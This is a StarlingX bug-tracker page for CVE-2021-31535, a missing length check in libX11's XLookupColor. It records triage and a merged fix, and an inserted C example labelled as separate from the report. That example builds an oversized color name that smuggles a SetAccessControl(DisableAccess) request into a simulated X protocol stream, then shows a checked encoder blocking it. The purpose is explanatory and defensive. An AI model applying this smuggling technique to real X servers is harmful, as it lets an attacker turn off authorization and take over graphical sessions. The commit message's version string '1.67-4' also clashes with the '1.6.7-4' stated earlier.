CVE-2021-31535 libX11: missing request length checks

Bug #1945997 reported by Ghada Khalil
Affects: StarlingX
Status: Fix Released
Importance: High
Assigned to: Joe Slater

Bug Description

CVSSv2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Description:
LookupCol.c in X.Org X through X11R7.7 and libX11 before 1.7.1 might allow remote attackers to execute arbitrary code. The libX11 XLookupColor request (intended for server-side color lookup) contains a flaw allowing a client to send color-name requests with a name longer than the maximum size allowed by the protocol (and also longer than the maximum packet size for normal-sized packets). The user-controlled data exceeding the maximum size is then interpreted by the server as additional X protocol requests and executed, e.g., to disable X server authorization completely. For example, if the victim encounters malicious terminal control sequences for color codes, then the attacker may be able to take full control of the running graphical session.

References:
https://nvd.nist.gov/vuln/detail/CVE-2021-31535
https://access.redhat.com/errata/RHSA-2021:3296
https://access.redhat.com/security/cve/CVE-2021-31535
https://lists.centos.org/pipermail/centos-announce/2021-August/048354.html

Required package version:
libX11-1.6.7-4.el7_9.x86_64.rpm

Packages:
libX11

Found during September 2021 StarlingX CVE Scan
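The length-wrap mechanism the description above refers to, as an added example that is not part of this bug report, of libX11, or of the StarlingX fix. It models the LookupColor wire format with its two 16-bit length fields (request length in 4-byte units, and name length), encodes a 256 KiB "color name" with and without a range check, and runs a toy server-side framer over the bytes to show how the oversized name turns into extra requests on the stream, here a constructed SetAccessControl(DisableAccess) request followed by a maximal NoOperation. Assumptions: native byte order on both sides, the name is passed with an explicit byte count rather than via strlen (so the constructed payload may contain zero bytes, which a real NUL-terminated color name could not), BIG-REQUESTS is not modelled, and the `nbytes > USHRT_MAX` check in the hardened encoder is this example's own model of a length check, not a copy of the upstream patch.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Core-protocol opcodes and values from the X11 protocol specification. */
#define X_LookupColor      92
#define X_SetAccessControl 111
#define X_NoOperation      127
#define DisableAccess      0
#define LOOKUPCOLOR_HDR    12   /* header + cmap + name length + 2 unused bytes */

/* 16-bit wire fields in native byte order; the toy server reads them back the same way. */
static void put16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static uint16_t get16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }

typedef size_t (*encoder_fn)(uint8_t *, size_t, uint32_t, const uint8_t *, size_t);

/* Encode LookupColor the way an unchecked client does: request length (4-byte units)
 * and name length both land in 16-bit fields with no range check, so they wrap. */
static size_t encode_lookup_color_unchecked(uint8_t *out, size_t cap, uint32_t cmap,
                                            const uint8_t *name, size_t nbytes)
{
    size_t padded = (nbytes + 3) & ~(size_t)3;
    size_t total = LOOKUPCOLOR_HDR + padded;
    if (cap < total) return 0;
    out[0] = X_LookupColor;
    out[1] = 0;
    put16(out + 2, (uint16_t)(total >> 2));    /* wraps once total >= 4 * 65536 */
    memcpy(out + 4, &cmap, 4);
    put16(out + 8, (uint16_t)nbytes);          /* wraps once nbytes >= 65536 */
    out[10] = out[11] = 0;
    memcpy(out + LOOKUPCOLOR_HDR, name, nbytes);
    memset(out + LOOKUPCOLOR_HDR + nbytes, 0, padded - nbytes);
    return total;
}

/* Hardened encoder: refuse any name the 16-bit fields cannot represent before a byte
 * reaches the wire. This check is the example's own model, not the libX11 patch. */
static size_t encode_lookup_color_checked(uint8_t *out, size_t cap, uint32_t cmap,
                                          const uint8_t *name, size_t nbytes)
{
    if (nbytes > USHRT_MAX) return 0;
    return encode_lookup_color_unchecked(out, cap, cmap, name, nbytes);
}

/* What the server ends up framing from one client write. */
typedef struct { size_t requests; int access_control_disabled; } server_view;

/* Toy dispatcher: split a byte stream into requests using only each header's
 * length field, which is how the real server finds request boundaries. */
static server_view split_requests(const uint8_t *buf, size_t len)
{
    server_view v = { 0, 0 };
    size_t off = 0;
    while (off + 4 <= len) {
        size_t units = get16(buf + off + 2);
        /* 0 would signal a BIG-REQUESTS extended length (not modelled): stop. */
        if (units == 0 || off + units * 4 > len) break;
        if (buf[off] == X_SetAccessControl && buf[off + 1] == DisableAccess)
            v.access_control_disabled = 1;
        off += units * 4;
        v.requests++;
    }
    return v;
}

/* Push a 256 KiB "color name" through the given encoder and report what the server
 * frames. 262144 name bytes + 12 header bytes = 65539 units, which wraps to 3 in a
 * 16-bit field; the name's own bytes then become the next requests on the stream. */
static server_view run_scenario(encoder_fn encode)
{
    server_view v = { 0, 0 };
    size_t nbytes = 262144;
    uint8_t *name = malloc(nbytes);
    uint8_t *wire = malloc(LOOKUPCOLOR_HDR + nbytes);
    if (!name || !wire) { free(name); free(wire); return v; }
    memset(name, 'A', nbytes);
    /* Constructed payload: bytes 0..3 form SetAccessControl(DisableAccess); bytes 4..7 a
     * maximal NoOperation header (65535 units) that swallows the remaining 262140 bytes. */
    name[0] = X_SetAccessControl; name[1] = DisableAccess; put16(name + 2, 1);
    name[4] = X_NoOperation;      name[5] = 0;             put16(name + 6, 65535);
    size_t n = encode(wire, LOOKUPCOLOR_HDR + nbytes, 0 /* cmap, irrelevant here */, name, nbytes);
    if (n != 0)                      /* the checked encoder sends nothing at all */
        v = split_requests(wire, n);
    free(name);
    free(wire);
    return v;
}

int main(void)
{
    server_view a = run_scenario(encode_lookup_color_unchecked);
    server_view b = run_scenario(encode_lookup_color_checked);
    printf("unchecked: %zu request(s) framed, access control disabled=%d\n", a.requests, a.access_control_disabled);
    printf("checked:   %zu request(s) framed, access control disabled=%d\n", b.requests, b.access_control_disabled);
    return 0;
}
```

With the unchecked encoder the server frames three requests from what the client believed was one: a 12-byte LookupColor with a zero-length name, then the smuggled SetAccessControl, then the NoOperation that consumes the rest. With the checked encoder nothing is written, which is the point of rejecting the name on the client before the length fields are populated.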

Ghada Khalil (gkhalil) wrote:

Screening: Marking as high priority as this CVE meets the StarlingX fix criteria. Should be fixed in stx master and cherry-picked to the r/stx.5.0 release branch.

Changed in starlingx:
assignee: nobody → Joe Slater (jslater0wind)
tags: added: stx.5.0 stx.6.0 stx.security
Changed in starlingx:
importance: Undecided → High
status: New → Triaged
Ghada Khalil (gkhalil)
information type: Public → Public Security
OpenStack Infra (hudson-openstack) wrote: Fix proposed to tools (master)

Fix proposed to branch: master
Review: https://review.opendev.org/c/starlingx/tools/+/812407

Changed in starlingx:
status: Triaged → In Progress
OpenStack Infra (hudson-openstack) wrote: Fix merged to tools (master)

Reviewed: https://review.opendev.org/c/starlingx/tools/+/812407
Committed: https://opendev.org/starlingx/tools/commit/2b9dc324f15e58ee7536116210f5c4648320092d
Submitter: "Zuul (22348)"
Branch: master

commit 2b9dc324f15e58ee7536116210f5c4648320092d
Author: Joe Slater <email address hidden>
Date: Mon Oct 4 15:57:16 2021 -0400

    libX11: fix CVE-2021-31535

    Supply missing libX11 length checks. Advance to version
    1.67-4.el7_9 for libX11, libX11-devel, and libX11-common.

    Testing
    PASS: install/configure aio-sx
    PASS: install/configure aio-dx

    Closes-Bug: 1945997
    Change-Id: I873bddb58c64331547186b6f89d89b2ff6dbd76c
    Signed-off-by: Joe Slater <email address hidden>

Changed in starlingx:
status: In Progress → Fix Released